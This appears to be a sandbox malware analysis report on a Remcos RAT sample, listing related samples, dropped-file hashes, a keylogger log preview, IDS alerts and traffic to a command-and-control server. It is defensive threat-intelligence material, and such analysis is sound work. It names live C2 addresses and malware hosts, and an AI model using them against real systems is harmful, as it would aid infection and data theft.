178.237.33.50 | LdSbZG1iH6.exe | malicious | Remcos, PureLog Stealer | geoplugin.net/json.gp
178.237.33.50 | 1733417286fc3e005fb672367f368896a7f5540f9ccbc4a8fc3e0e3c0df2cd0e1387254b67938.dat-decoded.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | tXcFA8apHU.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | f5TWdT5EAc.exe | malicious | Phorpiex, RHADAMANTHYS, Xmrig | www.geoplugin.net/json.gp?ip=
Match | Associated Sample Name / URL | Detection | Threat Name | Context
geoplugin.net | 1733479274764e7b4f05da07e19f78d3cf31f2aafa2f5d7a78af2fd18749e25dbbc1473b66785.dat-decoded.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | 17334752451c3a43189360a7e5b86f13b5ea7a6044304256a8f4c49ad5d5bd4831e72ee12e792.dat-decoded.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | scan_241205-801_draft_PO.exe | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | NewOrder12052024.js | malicious | Remcos | 178.237.33.50
geoplugin.net | W6iQkG4jZ1.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | VERSION.dll.dll | malicious | Remcos | 178.237.33.50
geoplugin.net | LdSbZG1iH6.exe | malicious | Remcos, PureLog Stealer | 178.237.33.50
geoplugin.net | 1733417286fc3e005fb672367f368896a7f5540f9ccbc4a8fc3e0e3c0df2cd0e1387254b67938.dat-decoded.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | tXcFA8apHU.exe | malicious | Remcos | 178.237.33.50
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AS-COLOCROSSING (US) | meerkat.x86.elf | malicious | Mirai | 104.168.61.38
AS-COLOCROSSING (US) | CGDL.doc | malicious | Unknown | 192.3.172.208
AS-COLOCROSSING (US) | seemejkiss.hta | malicious | Cobalt Strike, FormBook, HTMLPhisher | 107.175.113.196
AS-COLOCROSSING (US) | seemybestdayguvenu.hta | malicious | Cobalt Strike, FormBook, HTMLPhisher | 172.245.123.29
AS-COLOCROSSING (US) | k4PAIh16E6.exe | malicious | DCRat, PureLog Stealer, zgRAT | 192.3.118.10
AS-COLOCROSSING (US) | scan_241205-801_draft_PO.exe | malicious | Remcos, GuLoader | 104.168.7.16
AS-COLOCROSSING (US) | Transferencia de pago.xlam.xlsx | malicious | AgentTesla | 192.3.243.136
AS-COLOCROSSING (US) | LdSbZG1iH6.exe | malicious | Remcos, PureLog Stealer | 192.3.64.152
AS-COLOCROSSING (US) | maybecreatebesthingswithgreatnicewhichgivenbreakingthingstobe.hta | malicious | Cobalt Strike, FormBook, HTMLPhisher | 172.245.123.3
AS-COLOCROSSING (US) | Document.xla.xlsx | malicious | FormBook, HTMLPhisher | 107.172.44.175
ATOM86-AS ATOM86 (NL) | 1733479274764e7b4f05da07e19f78d3cf31f2aafa2f5d7a78af2fd18749e25dbbc1473b66785.dat-decoded.exe | malicious | Remcos | 178.237.33.50
ATOM86-AS ATOM86 (NL) | 17334752451c3a43189360a7e5b86f13b5ea7a6044304256a8f4c49ad5d5bd4831e72ee12e792.dat-decoded.exe | malicious | Remcos | 178.237.33.50
ATOM86-AS ATOM86 (NL) | scan_241205-801_draft_PO.exe | malicious | Remcos, GuLoader | 178.237.33.50
ATOM86-AS ATOM86 (NL) | NewOrder12052024.js | malicious | Remcos | 178.237.33.50
ATOM86-AS ATOM86 (NL) | W6iQkG4jZ1.exe | malicious | Remcos | 178.237.33.50
ATOM86-AS ATOM86 (NL) | VERSION.dll.dll | malicious | Remcos | 178.237.33.50
ATOM86-AS ATOM86 (NL) | LdSbZG1iH6.exe | malicious | Remcos, PureLog Stealer | 178.237.33.50
ATOM86-AS ATOM86 (NL) | 1733417286fc3e005fb672367f368896a7f5540f9ccbc4a8fc3e0e3c0df2cd0e1387254b67938.dat-decoded.exe | malicious | Remcos | 178.237.33.50
ATOM86-AS ATOM86 (NL) | tXcFA8apHU.exe | malicious | Remcos | 178.237.33.50
ATOM86-AS ATOM86 (NL) | f5TWdT5EAc.exe | malicious | Phorpiex, RHADAMANTHYS, Xmrig | 178.237.33.50
                                                                                          No context
                                                                                          No context
                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):65536
                                                                                          Entropy (8bit):1.2233160541443961
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:MHuZHa4dT6QMDc0UnU1aWB2WIt7YdzuiF9Z24lO8Qu:2L4dT1M7UnU1am2DYzuiF9Y4lO8Qu
                                                                                          MD5:BFE46A4DAAF9705F5FBF95C9314EC267
                                                                                          SHA1:3EFABB9BB4DCBD155113D90D313419BA5394E5B3
                                                                                          SHA-256:18DB1B0423D1A645971696038564E3E720250ADE4F20B672324B9B0F11AAA219
                                                                                          SHA-512:FF856307868429BDE77773571DF243FA56CC830FE8DE24331C34FE8A44C26F68DDDC1E56EA0481AF9CCD138D7C462BAD8AFA2673BBFF37B698919E7826BB855C
                                                                                          Malicious:false
                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                          File Type:Mini DuMP crash report, 16 streams, Sun Dec 8 07:42:10 2024, 0x1205a4 type
                                                                                          Category:dropped
                                                                                          Size (bytes):475542
                                                                                          Entropy (8bit):3.3193414031584094
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:Jh135T4M53iFt4RswwPxcSvKBbAMVukcfvH5Y5cD1CCqqlhFu/3+vyq0AA:71Jd5yFtnPhiAMncH5QcbqF3QB0A
                                                                                          MD5:CB671C8A310D60D893DB40E120E72E59
                                                                                          SHA1:6C747525AA7F1B433B4DB6F6EE7009D9A2508F4F
                                                                                          SHA-256:9659462D0EBE87808CD901D147120A3870C81F63F3E0A4623EE05F928C460213
                                                                                          SHA-512:FD5D01B3AD5136D4F13179166AC9D9E2F8CBE01734B6850B11CA4DAEBF3C76D552C24FC87CA9E8F57336E4ED68AA4F69F93BCD7CDBCC4F45323CF501F1A0658D
                                                                                          Malicious:false
                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):8820
                                                                                          Entropy (8bit):3.7093575070832547
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:R6l7wVeJsJNZP6YEItfCBrPgmfA74KApr789bFuVf+ui3m:R6lXJab6YECfAgmfU4K5FMf+Q
                                                                                          MD5:7631C9544A3FF3F50540C5E69BE4D49B
                                                                                          SHA1:76B82894BB4F53A604F75265B52C0406509AD206
                                                                                          SHA-256:5930BB80E643F08A5ABA7482C6E55080E4DF599A11D33D5DBB0A4855100886BD
                                                                                          SHA-512:EE41897D7FE2D393E3F6F476DA207073490E4E6C56A1F64BEC47EEA6964B001F21CCA15378962BA0EF8958E79FC58F909D46E997ACAD15118B2D67E94F2D45CA
                                                                                          Malicious:false
                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):4788
                                                                                          Entropy (8bit):4.521495373238268
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cvIwWl8zsk5Jg771I9J2WpW8VYyYm8M4JM+FMyyq85tTFi5j3d:uIjfkLI7mX7VKJuykFMj3d
                                                                                          MD5:722C9BE11F309AB95BEC832B9DDDBEA5
                                                                                          SHA1:78D2625D1020AA093867F92E062EF4BB65522CF0
                                                                                          SHA-256:30ADC98A3F4175DDDF674D8B1EB439BDA68A785732858FE54DC7BF24FC79203E
                                                                                          SHA-512:3C85D6D173C8B1AA36AA04AD686D2D6FA9590B17EB489E7F92EDD7DED0C741B0F04AC80BC5DE6D3AEEF2FC8C1F43633EEA87DC1A6D3DAD3A055B7870F4D5D03E
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="622004" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                          Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):144
                                                                                          Entropy (8bit):3.3458058208756873
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:rhlKlyK1vfRlVdclCl55JWRal2Jl+7R0DAlBG45klovDl6v:6lZKlCb5YcIeeDAlOWAv
                                                                                          MD5:01BE92B44D022666BC7BE909E6770F18
                                                                                          SHA1:AF71062DF6D2CE8784D373A74A5DA4B722F75571
                                                                                          SHA-256:A3237E49EDF20A6FE8857B317892BEF15F6DF538DFE00E33A233D80C5E222B63
                                                                                          SHA-512:2378543E7AD6E6E8F282B9D16061BB11CA84880D95009D3A2B7542B7E7869B8D785F185507A2BA74686674046B28DEFB3B0C1AC96EFFA7EF26B6509868C24BBA
                                                                                          Malicious:true
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                          Preview:....[.2.0.2.4./.1.2./.0.8. .0.2.:.4.2.:.0.9. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                                          Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):963
                                                                                          Entropy (8bit):5.014904284428935
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:tkluJnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qluNdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                                                          MD5:B66CFB6461E507BB577CDE91F270844E
                                                                                          SHA1:6D952DE48032731679F8718D1F1C3F08202507C3
                                                                                          SHA-256:E231BBC873E9B30CCA58297CAA3E8945A4FC61556F378F2C5013B0DDCB7035BE
                                                                                          SHA-512:B5C1C188F10C9134EF38D0C5296E7AE95A7A486F858BE977F9A36D63CBE5790592881F3B8D12FEBBF1E555D0A9868632D9E590777E2D3143E74FD3A44C55575F
                                                                                          Malicious:false
                                                                                          Preview:{. "geoplugin_request":"8.46.123.228",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):64
                                                                                          Entropy (8bit):1.1940658735648508
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Nlllultnxj:NllU
                                                                                          MD5:F93358E626551B46E6ED5A0A9D29BD51
                                                                                          SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                                                                          SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                                                                          SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                                                                          Malicious:false
                                                                                          Preview:@...e................................................@..........
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x43d71b72, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                          Category:dropped
                                                                                          Size (bytes):17301504
                                                                                          Entropy (8bit):0.8012013173000725
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:KdfjZb5aXEY2waXEY24URlWe4APXAP5APzAPwbndOO8pHAP6JnTJnTbnSotnBQ+z:IVQ4e81ySaKKjLrONseWe
                                                                                          MD5:52B2CAC6E3EB2C460304F0BC817F70C1
                                                                                          SHA1:318E016752BA38790CDC4DF2D779C915F3065962
                                                                                          SHA-256:E705E70A3ED6E754B076839DF39A188B65E14E7A9B56240C3E02DDA9949EFD3C
                                                                                          SHA-512:834D35572525BCEAAF0CF32C0B5040A0140730883E06174690345B02D4871AFAE348B1148089C3A67DA395C9274B1120F79472894514C29F016656055B32C5CD
                                                                                          Malicious:false
                                                                                          Preview:C..r... .......;!......E{ow("...{........................@.....8....{..7)...|g.h.B............................("...{q............................................................................................._...........eJ......n........................................................................................................... ............{...................................................................................................................................................................................................{]..................................&..7)...|g...................Q.7)...|g..........................#......h.B.....................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                                                                          File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2
                                                                                          Entropy (8bit):1.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Qn:Qn
                                                                                          MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                          SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                          Malicious:false
                                                                                          Preview:..
                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                          Category:dropped
                                                                                          Size (bytes):1835008
                                                                                          Entropy (8bit):4.421683353317405
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:rSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnN80uhiTw:WvloTMW+EZMM6DFyC03w
                                                                                          MD5:669581FBCE1356D97EBF52ACF0F18EE1
                                                                                          SHA1:4CF0E71139207B18D246C07F3C86B5F2C126665F
                                                                                          SHA-256:8E56DD004BB6379D317A6A20A2F6E82501568DEAED2F81129927AF1F5762A355
                                                                                          SHA-512:5D0B5E5054155D06E43CFD268E44648745F356B05EDA02E4B55361B48BB15DC3798583BBB27DE2963D3C8783CA2A0CAE3BB47180DAA80763BCB5AC10CAD2FFBB
                                                                                          Malicious:false
                                                                                          Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmZ...DI...............................................................................................................................................................................................................................................................................................................................................G..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\Desktop\IB9876789000.bat.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):14
                                                                                          Entropy (8bit):3.3248629576173565
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:aByn:awn
                                                                                          MD5:7012ACBB1D394B20567DFFBF0992B677
                                                                                          SHA1:EA7B8499509DA0261A19E48A8631A6A506F0DE0A
                                                                                          SHA-256:CFCE4E2952591E79A0DEA1654A92DBA4F099D348AB7C176BCD052D69B8929770
                                                                                          SHA-512:C93B972A8979412CE14614DA57E4902CE982F76BEA72834D160234E76E39393279367771D945D56451E14FB7D7DF762B542310D4404F5A6193D7FB95FA70FB7F
                                                                                          Malicious:false
                                                                                          Preview:Hello World!..
                                                                                          File type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                          Entropy (8bit):7.997018603827521
                                                                                          TrID:
                                                                                          • Win64 Executable Console Net Framework (206006/5) 48.58%
                                                                                          • Win64 Executable Console (202006/5) 47.64%
                                                                                          • Win64 Executable (generic) (12005/4) 2.83%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.47%
                                                                                          • DOS Executable Generic (2002/1) 0.47%
                                                                                          File name:IB9876789000.bat.exe
                                                                                          File size:851'968 bytes
                                                                                          MD5:f443c222255e35ee6dd0e194360c23ce
                                                                                          SHA1:a8c84df31a575ab84e6255b89351ce877c9619c8
                                                                                          SHA256:7053c8d9983dc949e5d559ba1b006b8ba9c059a23e06cd87c857c3d04201381b
                                                                                          SHA512:ca58f238cf2599fabd5c34faa34630e2f158cc87a612ad1783a5982b7c835bf7941ee68699dc3e9486f01b578caf6ac53a15f22b92398aa32c8d8742d202fe53
                                                                                          SSDEEP:12288:OeB1Nd/75yaHV5epXyU8+uggQdbGqDEEiHczNGNB4aEPvl1bDDdOJVe3e+mraL:OW1D5yeV5eNyB7QtHDE3HcE0DA8mraL
                                                                                          TLSH:9A05233811D9CE8BD6D746F56C50B5C28AB7F49306E65F0E2BC23AEED194A44027E63C
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...R.Pg.........."...0..0............... ....@...... .......................@............`................................
                                                                                          Icon Hash:00928e8e8686b000
                                                                                          Entrypoint:0x400000
                                                                                          Entrypoint Section:
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows cui
                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0x67508452 [Wed Dec 4 16:33:22 2024 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:4
                                                                                          OS Version Minor:0
                                                                                          File Version Major:4
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:4
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:
                                                                                          Instruction
                                                                                          dec ebp
                                                                                          pop edx
                                                                                          nop
                                                                                          add byte ptr [ebx], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax+eax], al
                                                                                          add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6000 | 0xccb68 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2000 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x30d8 | 0x3200 | 81359025918218b44ae69c8197cef225 | False | 0.599453125 | data | 5.958757921602617 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x6000 | 0xccb68 | 0xccc00 | ae7ee54418905f8798c73eeca4582777 | False | 0.9994467338217338 | data | 7.999679229003933 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
M4LWARE | 0x6110 | 0xcc618 | data | | | 1.0003177470064888
RT_VERSION | 0xd2728 | 0x254 | data | | | 0.45805369127516776
RT_MANIFEST | 0xd297c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-08T08:42:10.005853+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.5 | 49717 | 192.210.150.26 | 3678 | TCP
2024-12-08T08:42:11.112791+0100 | 2032777 | ET MALWARE Remcos 3.x Unencrypted Server Response | 1 | 192.210.150.26 | 3678 | 192.168.2.5 | 49717 | TCP
2024-12-08T08:42:13.381508+0100 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.5 | 49720 | 178.237.33.50 | 80 | TCP
2024-12-08T08:44:14.205921+0100 | 2032777 | ET MALWARE Remcos 3.x Unencrypted Server Response | 1 | 192.210.150.26 | 3678 | 192.168.2.5 | 49717 | TCP
2024-12-08T08:46:14.509273+0100 | 2032777 | ET MALWARE Remcos 3.x Unencrypted Server Response | 1 | 192.210.150.26 | 3678 | 192.168.2.5 | 49717 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 8, 2024 08:42:09.880099058 CET | 49717 | 3678 | 192.168.2.5 | 192.210.150.26
Dec 8, 2024 08:42:10.000214100 CET | 3678 | 49717 | 192.210.150.26 | 192.168.2.5
Dec 8, 2024 08:42:10.002479076 CET | 49717 | 3678 | 192.168.2.5 | 192.210.150.26
Dec 8, 2024 08:42:10.005852938 CET | 49717 | 3678 | 192.168.2.5 | 192.210.150.26
Dec 8, 2024 08:42:10.125838995 CET | 3678 | 49717 | 192.210.150.26 | 192.168.2.5
Dec 8, 2024 08:42:11.112791061 CET | 3678 | 49717 | 192.210.150.26 | 192.168.2.5
Dec 8, 2024 08:42:11.143712044 CET | 49717 | 3678 | 192.168.2.5 | 192.210.150.26
Dec 8, 2024 08:42:11.263075113 CET | 3678 | 49717 | 192.210.150.26 | 192.168.2.5
Dec 8, 2024 08:42:11.344871998 CET | 3678 | 49717 | 192.210.150.26 | 192.168.2.5
Dec 8, 2024 08:42:11.365712881 CET | 49719 | 3678 | 192.168.2.5 | 192.210.150.26
Dec 8, 2024 08:42:11.387917995 CET | 49717 | 3678 | 192.168.2.5 | 192.210.150.26
Dec 8, 2024 08:42:11.485104084 CET | 3678 | 49719 | 192.210.150.26 | 192.168.2.5
Dec 8, 2024 08:42:11.485182047 CET | 49719 | 3678 | 192.168.2.5 | 192.210.150.26
Dec 8, 2024 08:42:11.485452890 CET | 49719 | 3678 | 192.168.2.5 | 192.210.150.26
Dec 8, 2024 08:42:11.604827881 CET | 3678 | 49719 | 192.210.150.26 | 192.168.2.5
Dec 8, 2024 08:42:12.015490055 CET | 49720 | 80 | 192.168.2.5 | 178.237.33.50
Dec 8, 2024 08:42:12.134850025 CET | 80 | 49720 | 178.237.33.50 | 192.168.2.5
Dec 8, 2024 08:42:12.135076046 CET | 49720 | 80 | 192.168.2.5 | 178.237.33.50
Dec 8, 2024 08:42:12.135351896 CET | 49720 | 80 | 192.168.2.5 | 178.237.33.50
Dec 8, 2024 08:42:12.254518032 CET | 80 | 49720 | 178.237.33.50 | 192.168.2.5
Dec 8, 2024 08:42:12.633450031 CET | 3678 | 49719 | 192.210.150.26 | 192.168.2.5
Dec 8, 2024 08:42:12.633629084 CET | 3678 | 49719 | 192.210.150.26 | 192.168.2.5
Dec 8, 2024 08:42:12.633635044 CET | 3678 | 49719 | 192.210.150.26 | 192.168.2.5
Dec 8, 2024 08:42:12.633649111 CET | 3678 | 49719 | 192.210.150.26 | 192.168.2.5
Dec 8, 2024 08:42:12.633656025 CET | 3678 | 49719 | 192.210.150.26 | 192.168.2.5
Dec 8, 2024 08:42:12.633667946 CET | 3678 | 49719 | 192.210.150.26 | 192.168.2.5
Dec 8, 2024 08:42:12.633675098 CET | 3678 | 49719 | 192.210.150.26 | 192.168.2.5
Dec 8, 2024 08:42:12.633781910 CET | 49719 | 3678 | 192.168.2.5 | 192.210.150.26
Dec 8, 2024 08:42:12.633847952 CET | 49719 | 3678 | 192.168.2.5 | 192.210.150.26
Dec 8, 2024 08:42:12.633877039 CET | 3678 | 49719 | 192.210.150.26 | 192.168.2.5
Dec 8, 2024 08:42:12.633883953 CET | 3678 | 49719 | 192.210.150.26 | 192.168.2.5
Dec 8, 2024 08:42:12.633897066 CET | 3678 | 49719 | 192.210.150.26 | 192.168.2.5
Dec 8, 2024 08:42:12.633936882 CET | 49719 | 3678 | 192.168.2.5 | 192.210.150.26
Dec 8, 2024 08:42:12.753299952 CET | 3678 | 49719 | 192.210.150.26 | 192.168.2.5
Dec 8, 2024 08:42:12.753396034 CET | 3678 | 49719 | 192.210.150.26 | 192.168.2.5
Dec 8, 2024 08:42:12.753457069 CET | 49719 | 3678 | 192.168.2.5 | 192.210.150.26
Dec 8, 2024 08:42:12.757561922 CET | 3678 | 49719 | 192.210.150.26 | 192.168.2.5
Dec 8, 2024 08:42:12.757608891 CET | 3678 | 49719 | 192.210.150.26 | 192.168.2.5
Dec 8, 2024 08:42:12.757675886 CET | 49719 | 3678 | 192.168.2.5 | 192.210.150.26
Dec 8, 2024 08:42:12.825659037 CET | 3678 | 49719 | 192.210.150.26 | 192.168.2.5
Dec 8, 2024 08:42:12.825670958 CET | 3678 | 49719 | 192.210.150.26 | 192.168.2.5
Dec 8, 2024 08:42:12.825758934 CET | 49719 | 3678 | 192.168.2.5 | 192.210.150.26
Dec 8, 2024 08:42:12.829673052 CET | 3678 | 49719 | 192.210.150.26 | 192.168.2.5
Dec 8, 2024 08:42:12.829775095 CET | 3678 | 49719 | 192.210.150.26 | 192.168.2.5
Dec 8, 2024 08:42:12.829828978 CET | 49719 | 3678 | 192.168.2.5 | 192.210.150.26
Dec 8, 2024 08:42:12.838059902 CET | 3678 | 49719 | 192.210.150.26 | 192.168.2.5
Dec 8, 2024 08:42:12.838157892 CET | 3678 | 49719 | 192.210.150.26 | 192.168.2.5
Dec 8, 2024 08:42:12.838229895 CET | 49719 | 3678 | 192.168.2.5 | 192.210.150.26
Dec 8, 2024 08:42:12.846402884 CET | 3678 | 49719 | 192.210.150.26 | 192.168.2.5
Dec 8, 2024 08:42:12.846544027 CET | 3678 | 49719 | 192.210.150.26 | 192.168.2.5
Dec 8, 2024 08:42:12.846596003 CET | 49719 | 3678 | 192.168.2.5 | 192.210.150.26
Dec 8, 2024 08:42:12.854850054 CET | 3678 | 49719 | 192.210.150.26 | 192.168.2.5
Dec 8, 2024 08:42:12.854921103 CET | 3678 | 49719 | 192.210.150.26 | 192.168.2.5
Dec 8, 2024 08:42:12.855129957 CET | 49719 | 3678 | 192.168.2.5 | 192.210.150.26
Dec 8, 2024 08:42:12.863147974 CET | 3678 | 49719 | 192.210.150.26 | 192.168.2.5
Dec 8, 2024 08:42:12.863251925 CET | 3678 | 49719 | 192.210.150.26 | 192.168.2.5
Dec 8, 2024 08:42:12.863476992 CET | 49719 | 3678 | 192.168.2.5 | 192.210.150.26
Dec 8, 2024 08:42:12.871586084 CET | 3678 | 49719 | 192.210.150.26 | 192.168.2.5
Dec 8, 2024 08:42:12.871607065 CET | 3678 | 49719 | 192.210.150.26 | 192.168.2.5
